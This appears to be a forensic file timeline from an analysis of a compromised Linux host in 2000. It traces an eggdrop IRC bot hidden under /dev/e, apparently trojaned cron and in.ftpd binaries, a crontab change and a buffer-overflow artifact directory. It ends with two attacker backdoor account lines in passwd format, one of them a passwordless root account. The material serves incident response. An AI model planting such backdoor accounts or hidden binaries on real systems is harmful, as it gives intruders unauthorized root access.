/dev/e/eggdrop1.4.2/src/mod/assoc.o Tue Feb 22 13:13:36 2000 Tue Feb 22 13:13:35 2000 /dev/e/eggdrop1.4.2/src/mod/blowfish.o Tue Feb 22 13:14:30 2000 Tue Feb 22 13:14:30 2000 /dev/e/eggdrop1.4.2/src/mod/channels.o Tue Feb 22 13:14:34 2000 Tue Feb 22 13:14:34 2000 /dev/e/eggdrop1.4.2/src/mod/console.o Tue Feb 22 13:14:38 2000 Tue Feb 22 13:14:38 2000 /dev/e/eggdrop1.4.2/src/mod/ctcp.o Tue Feb 22 13:15:12 2000 Tue Feb 22 13:15:12 2000 /dev/e/eggdrop1.4.2/src/mod/filesys.o Tue Feb 22 13:16:06 2000 Tue Feb 22 13:16:06 2000 /dev/e/eggdrop1.4.2/src/mod/irc.o Tue Feb 22 13:16:18 2000 Tue Feb 22 13:16:17 2000 /dev/e/eggdrop1.4.2/src/mod/notes.o Tue Feb 22 13:16:23 2000 Tue Feb 22 13:16:23 2000 /dev/e/eggdrop1.4.2/src/mod/seen.o Tue Feb 22 13:16:44 2000 Tue Feb 22 13:16:44 2000 /dev/e/eggdrop1.4.2/src/mod/server.o Tue Feb 22 13:17:02 2000 Tue Feb 22 13:17:02 2000 /dev/e/eggdrop1.4.2/src/mod/share.o Tue Feb 22 13:17:19 2000 Tue Feb 22 13:17:19 2000 /dev/e/eggdrop1.4.2/src/mod/transfer.o Tue Feb 22 13:17:26 2000 Tue Feb 22 13:17:26 2000 /dev/e/eggdrop1.4.2/src/mod/wire.o Tue Feb 22 13:17:28 2000 Tue Feb 22 13:17:27 2000 /dev/e/eggdrop1.4.2/src/mod/woobie.o Tue Feb 22 13:10:32 2000 Tue Feb 22 13:09:55 2000 /dev/e/eggdrop1.4.2/src/Makefile Tue Feb 22 13:13:25 2000 Tue Feb 22 13:10:42 2000 /dev/e/eggdrop1.4.2/src/botcmd.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:10:49 2000 /dev/e/eggdrop1.4.2/src/botmsg.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:03 2000 /dev/e/eggdrop1.4.2/src/botnet.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:08 2000 /dev/e/eggdrop1.4.2/src/chanprog.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:30 2000 /dev/e/eggdrop1.4.2/src/cmds.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:45 2000 /dev/e/eggdrop1.4.2/src/dcc.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:50 2000 /dev/e/eggdrop1.4.2/src/dccutil.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:55 2000 /dev/e/eggdrop1.4.2/src/flags.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:59 2000 /dev/e/eggdrop1.4.2/src/language.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:05 2000 /dev/e/eggdrop1.4.2/src/main.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:06 2000 /dev/e/eggdrop1.4.2/src/mem.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:15 2000 /dev/e/eggdrop1.4.2/src/misc.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:18 2000 /dev/e/eggdrop1.4.2/src/modules.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:26 2000 /dev/e/eggdrop1.4.2/src/net.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:28 2000 /dev/e/eggdrop1.4.2/src/rfc1459.o Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:32 2000 /dev/e/eggdrop1.4.2/src/tcl.o Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:42 2000 /dev/e/eggdrop1.4.2/src/tcldcc.o Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:50 2000 /dev/e/eggdrop1.4.2/src/tclhash.o Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:54 2000 /dev/e/eggdrop1.4.2/src/tclmisc.o Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:58 2000 /dev/e/eggdrop1.4.2/src/tcluser.o Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:05 2000 /dev/e/eggdrop1.4.2/src/userent.o Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:10 2000 /dev/e/eggdrop1.4.2/src/userrec.o Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:21 2000 /dev/e/eggdrop1.4.2/src/users.o Tue Feb 22 13:10:31 2000 Tue Feb 22 13:09:54 2000 /dev/e/eggdrop1.4.2/Makefile Tue Feb 22 13:09:29 2000 Tue Feb 22 13:09:52 2000 /dev/e/eggdrop1.4.2/config.log Tue Feb 22 13:17:26 2000 Tue Feb 22 13:09:58 2000 /dev/e/eggdrop1.4.2/config.h Tue Feb 22 13:09:29 2000 Tue Feb 22 13:09:52 2000 /dev/e/eggdrop1.4.2/config.cache Tue Feb 22 13:09:58 2000 Tue Feb 22 13:09:53 2000 /dev/e/eggdrop1.4.2/config.status Tue Feb 22 13:10:31 2000 Tue Feb 22 13:10:31 2000 /dev/e/eggdrop1.4.2/EGGMOD.stamp Tue Feb 22 13:17:26 2000 Tue Feb 22 13:09:56 2000 /dev/e/eggdrop1.4.2/lush.h Mon Apr 10 11:50:01 2000 Tue Feb 22 13:13:30 2000 /dev/e/eggdrop1.4.2/assoc.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:13:36 2000 /dev/e/eggdrop1.4.2/blowfish.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:14:30 2000 /dev/e/eggdrop1.4.2/channels.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:14:34 2000 /dev/e/eggdrop1.4.2/console.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:14:38 2000 /dev/e/eggdrop1.4.2/ctcp.so Tue Feb 22 13:15:12 2000 Tue Feb 22 13:15:12 2000 /dev/e/eggdrop1.4.2/filesys.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:06 2000 /dev/e/eggdrop1.4.2/irc.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:18 2000 /dev/e/eggdrop1.4.2/notes.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:23 2000 /dev/e/eggdrop1.4.2/seen.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:44 2000 /dev/e/eggdrop1.4.2/server.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:17:02 2000 /dev/e/eggdrop1.4.2/share.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:17:19 2000 /dev/e/eggdrop1.4.2/transfer.so Mon Apr 10 11:50:01 2000 Tue Feb 22 13:17:26 2000 /dev/e/eggdrop1.4.2/wire.so Tue Feb 22 13:17:28 2000 Tue Feb 22 13:17:28 2000 /dev/e/eggdrop1.4.2/woobie.so Tue Feb 22 13:46:31 2000 Tue Feb 22 13:45:55 2000 /dev/e/eggdrop1.4.2/cron Mon Apr 10 11:50:00 2000 Tue Feb 22 13:13:26 2000 /dev/e/eggdrop1.4.2/in.ftpd Mon Apr 10 11:46:32 2000 Tue Feb 22 13:46:31 2000 /var/spool/cron Mon Apr 10 11:52:02 2000 Tue Feb 22 13:46:31 2000 /var/spool/cron/root Fri Apr 7 04:08:39 2000 Tue Feb 22 07:40:02 2000 /var/named Fri Apr 7 04:08:39 2000 Tue Feb 22 07:40:02 2000 /var/named/ADMROCKS (emtpy directory that created by the buffer over program) Tue Apr 4 12:28:58 2000 Tue Feb 22 13:06:28 2000 /root/.ncftp/firewall Tue Apr 4 12:28:58 2000 Tue Feb 22 13:09:00 2000 /root/.ncftp/prefsThe hacker backdoor accountsserver::0:0::/:/bin/bash cove:x:900:100::/tmp:/bin/bash
References:
Orignal Files and logging at 137.189.victim2
.bash_history